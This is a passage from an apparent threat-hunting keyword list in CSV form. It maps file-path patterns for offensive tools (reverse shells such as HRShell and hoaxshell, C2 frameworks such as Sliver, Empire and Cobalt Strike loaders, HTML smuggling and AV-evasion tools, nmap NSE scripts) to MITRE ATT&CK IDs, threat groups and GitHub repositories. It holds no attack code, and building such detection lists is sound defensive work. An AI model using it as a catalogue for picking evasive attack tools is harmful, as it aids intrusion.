APT29,C2,https://github.com/boku7/HOLLOW,1,1,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*/HookDetector.exe*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/hooks/spoof.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/hop.php*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/horizon3ai/*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*/hostenum.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/hostmap-bfk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hostmap-crtsh.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hostmap-robtex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HouQing/*/Loader.go,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*/HRShell.git*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/HRShell/*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/hta_attack/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/HTMLSmuggler.git*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*/HTMLSmuggler/*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*/htshells.git*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*/http_payload.ps1*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/http-adobe-coldfusion-apsa1301.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-affiliate-id.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-apache-negotiation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-apache-server-status.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-aspnet-debug.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/httpattack.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*/http-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-auth-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-avaya-ipoffice-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-awstatstotals-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-axis2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-backup-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-barracuda-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-bigip-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-c2.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/http-cakephp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-chrono.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cisco-anyconnect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-coldfusion-subzero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-comments-displayer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-config-backup.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cookie-flags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cross-domain-policy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-csrf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-default-accounts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-devframework.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-dlink-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-dombased-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-domino-enum-passwords.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-drupal-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-drupal-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-errors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-exif-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-favicon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-feed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-fetch.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-fileupload-exploiter.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-form-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-form-fuzzer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-frontpage-login.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-generator.nse*,offensive_tool_keyword,nmap,Nmap 